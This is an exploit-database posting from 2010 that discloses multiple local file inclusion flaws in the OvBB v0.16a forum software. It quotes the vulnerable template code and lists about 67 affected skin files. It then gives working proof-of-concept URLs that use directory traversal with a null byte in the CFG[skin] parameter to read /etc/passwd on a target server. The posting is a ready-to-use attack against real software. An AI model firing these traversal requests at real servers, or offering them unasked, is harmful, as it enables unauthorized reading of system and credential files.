[webapps / 0day] - OvBB v0.16a Multiple Local File Inclusion
Posted on 23 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>OvBB v0.16a Multiple Local File Inclusion Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 23 Sep 2010 | Exploit category: webapps / 0day | Exploit author: cOndemned | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================================= OvBB v0.16a Multiple Local File Inclusion Vulnerabilities ========================================================= OvBB v0.16a Multiple Local File Inclusion Vulnerabilities Found by cOndemned Tested on Linux Debian (apache + php5 + mysql) (download at http://sourceforge.net/projects/ovbb/) source of /skins/default/addevent.tpl.php 1. <?php 2. // Header. 3. $strPageTitle = " :: Calendar :. New{$strType} Event"; 4. require("./skins/{$CFG['skin']}/header.tpl.php"); // LFI description: register_globals must be turned on and magic quotes gpc must be turned off in order to exploit thoes vulnerabilities. thing looks the same in ALMOST all files in /skins/default directory. (there is about 67 vulnerable files) prior versions may also be affected. list of vulnerable files: /skins/default/addevent.tpl.php /skins/default/alreadyregistered.tpl.php /skins/default/calendar.tpl.php /skins/default/deleteposts.tpl.php /skins/default/deletethread.tpl.php /skins/default/editevent.tpl.php /skins/default/editpost.tpl.php /skins/default/forgotdetails.tpl.php /skins/default/getip.tpl.php /skins/default/index.tpl.php /skins/default/justregistered.tpl.php /skins/default/login.tpl.php /skins/default/mailuser.tpl.php /skins/default/memberlist.tpl.php /skins/default/movecopythread.tpl.php /skins/default/newpoll.tpl.php /skins/default/online.tpl.php /skins/default/pollresults.tpl.php /skins/default/post.tpl.php /skins/default/register.tpl.php /skins/default/sysmessage.tpl.php /skins/default/unauthorized.tpl.php /skins/default/admincp/addattachment.tpl.php /skins/default/admincp/addavatar.tpl.php /skins/default/admincp/addforum.tpl.php /skins/default/admincp/addposticon.tpl.php /skins/default/admincp/addskin.tpl.php /skins/default/admincp/addsmilie.tpl.php /skins/default/admincp/addusergroup.tpl.php /skins/default/admincp/addusergroupuser.tpl.php /skins/default/admincp/attachments.tpl.php /skins/default/admincp/avatars.tpl.php /skins/default/admincp/censored.tpl.php /skins/default/admincp/editattachment.tpl.php /skins/default/admincp/editavatar.tpl.php /skins/default/admincp/editforum.tpl.php /skins/default/admincp/editposticon.tpl.php /skins/default/admincp/editskin.tpl.php /skins/default/admincp/editsmilie.tpl.php /skins/default/admincp/editusergroup.tpl.php /skins/default/admincp/forums.tpl.php /skins/default/admincp/general.tpl.php /skins/default/admincp/posticons.tpl.php /skins/default/admincp/removeattachment.tpl.php /skins/default/admincp/removeavatar.tpl.php /skins/default/admincp/removeforum.tpl.php /skins/default/admincp/removeposticon.tpl.php /skins/default/admincp/removeskin.tpl.php /skins/default/admincp/removesmilie.tpl.php /skins/default/admincp/removeusergroup.tpl.php /skins/default/admincp/skins.tpl.php /skins/default/admincp/smilies.tpl.php /skins/default/admincp/style.tpl.php /skins/default/admincp/usergroups.tpl.php /skins/default/pm/folders.tpl.php /skins/default/pm/inbox.tpl.php /skins/default/pm/newmessage.tpl.php /skins/default/pm/sentitems.tpl.php /skins/default/pm/tracking.tpl.php /skins/default/search/main.tpl.php /skins/default/usercp/avatar.tpl.php /skins/default/usercp/buddylist.tpl.php /skins/default/usercp/ignorelist.tpl.php /skins/default/usercp/main.tpl.php /skins/default/usercp/options.tpl.php /skins/default/usercp/password.tpl.php /skins/default/usercp/profile.tpl.php proof of concept: http://[target]/[OvBB_path]/skins/default/addevent.tpl.php?CFG[skin]=../../../../../../../../../etc/passwd%00 http://[target]/[OvBB_path]/skins/default/alreadyregistered.tpl.php?CFG[skin]=../../../../../../../../../etc/passwd%00 http://[target]/[OvBB_path]/skins/default/calendar.tpl.php?CFG[skin]=../../../../../../../../../etc/passwd%00 http://[target]/[OvBB_path]/skins/default/deleteposts.tpl.php?CFG[skin]=../../../../../../../../../etc/passwd%00 http://[target]/[OvBB_path]/skins/default/deletethread.tpl.php?CFG[skin]=../../../../../../../../../etc/passwd%00 etc... # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-23]</pre></body></html>
